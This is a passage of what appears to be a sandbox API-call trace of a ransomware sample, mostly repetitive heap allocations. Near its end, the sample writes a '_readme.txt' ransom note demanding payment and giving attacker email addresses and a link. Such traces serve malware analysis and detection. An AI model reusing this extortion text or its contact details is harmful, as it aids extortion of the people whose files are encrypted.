dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.682] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0201.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.682] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.683] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.683] PathFindFileNameW (pszPath="") returned="" [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.683] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.683] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.683] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.683] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.683] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0201.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.684] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0201.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.684] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail 